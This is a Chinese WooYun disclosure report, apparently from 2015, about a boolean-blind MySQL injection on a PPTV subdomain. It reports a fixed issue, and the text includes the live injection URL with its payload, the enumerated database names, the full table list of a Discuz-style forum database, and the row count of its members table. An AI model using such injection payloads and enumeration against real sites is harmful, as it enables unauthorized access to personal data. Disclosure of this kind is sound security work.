当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090129

漏洞标题:PPTV某站点MySQL注射(members表33万数据)

相关厂商:PPTV(PPlive)

漏洞作者: lijiejie

提交时间:2015-01-05 20:19

修复时间:2015-01-07 14:35

公开时间:2015-01-07 14:35

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-05: 细节已通知厂商并且等待厂商处理中
2015-01-06: 厂商已经确认,细节仅向厂商公开
2015-01-07: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

PPTV某站点MySQL注射(members表33万数据), MySQL bool blind.

详细说明:

注入点:

http://ksf.zone.pptv.com/post?id=1 AND length(user())=19


参数id可注入。 MySQL bool blind.
还有个域名: http://expo2010.pptv.com/

漏洞证明:

current user:    'pp_ae@10.%'


available databases [10]:
[*] information_schema
[*] pp_hezuo_swarovski
[*] pp_zo_inyy
[*] pp_zo_vmei
[*] pp_zone
[*] pp_zone_public
[*] pplive_ctf
[*] pplive_heiren
[*] pplive_kefu
[*] pplive_rss


kefu表:

Database: pplive_kefu
[103 tables]
+----------------------+
| cdb_access           |
| cdb_activities       |
| cdb_activityapplies  |
| cdb_addons           |
| cdb_adminactions     |
| cdb_admincustom      |
| cdb_admingroups      |
| cdb_adminnotes       |
| cdb_adminsessions    |
| cdb_advertisements   |
| cdb_announcements    |
| cdb_attachmentfields |
| cdb_attachments      |
| cdb_attachpaymentlog |
| cdb_attachtypes      |
| cdb_banned           |
| cdb_bbcodes          |
| cdb_caches           |
| cdb_creditslog       |
| cdb_crons            |
| cdb_debateposts      |
| cdb_debates          |
| cdb_failedlogins     |
| cdb_faqs             |
| cdb_favoriteforums   |
| cdb_favorites        |
| cdb_favoritethreads  |
| cdb_feeds            |
| cdb_forumfields      |
| cdb_forumlinks       |
| cdb_forumrecommend   |
| cdb_forums           |
| cdb_imagetypes       |
| cdb_invites          |
| cdb_itempool         |
| cdb_magiclog         |
| cdb_magicmarket      |
| cdb_magics           |
| cdb_medallog         |
| cdb_medals           |
| cdb_memberfields     |
| cdb_membermagics     |
| cdb_memberrecommend  |
| cdb_members          |
| cdb_memberspaces     |
| cdb_moderators       |
| cdb_modworks         |
| cdb_mytasks          |
| cdb_navs             |
| cdb_onlinelist       |
| cdb_onlinetime       |
| cdb_orders           |
| cdb_paymentlog       |
| cdb_pluginhooks      |
| cdb_plugins          |
| cdb_pluginvars       |
| cdb_polloptions      |
| cdb_polls            |
| cdb_postposition     |
| cdb_posts            |
| cdb_profilefields    |
| cdb_projects         |
| cdb_promotions       |
| cdb_prompt           |
| cdb_promptmsgs       |
| cdb_prompttype       |
| cdb_ranks            |
| cdb_ratelog          |
| cdb_regips           |
| cdb_relatedthreads   |
| cdb_reportlog        |
| cdb_request          |
| cdb_rewardlog        |
| cdb_rsscaches        |
| cdb_searchindex      |
| cdb_sessions         |
| cdb_settings         |
| cdb_smilies          |
| cdb_spacecaches      |
| cdb_stats            |
| cdb_statvars         |
| cdb_styles           |
| cdb_stylevars        |
| cdb_tags             |
| cdb_tasks            |
| cdb_taskvars         |
| cdb_templates        |
| cdb_threads          |
| cdb_threadsmod       |
| cdb_threadtags       |
| cdb_threadtypes      |
| cdb_tradecomments    |
| cdb_tradelog         |
| cdb_tradeoptionvars  |
| cdb_trades           |
| cdb_typemodels       |
| cdb_typeoptions      |
| cdb_typeoptionvars   |
| cdb_typevars         |
| cdb_usergroups       |
| cdb_validating       |
| cdb_warnings         |
| cdb_words            |
+----------------------+


members表有30多万数据:

Database: pplive_kefu
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| cdb_members | 331865  |
+-------------+---------+


到此为止,未进一步利用。

修复方案:

转换,过滤

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-01-06 09:49

厂商回复:

非常感谢,我们安排处理中

最新状态:

2015-01-07:已修复 感谢各位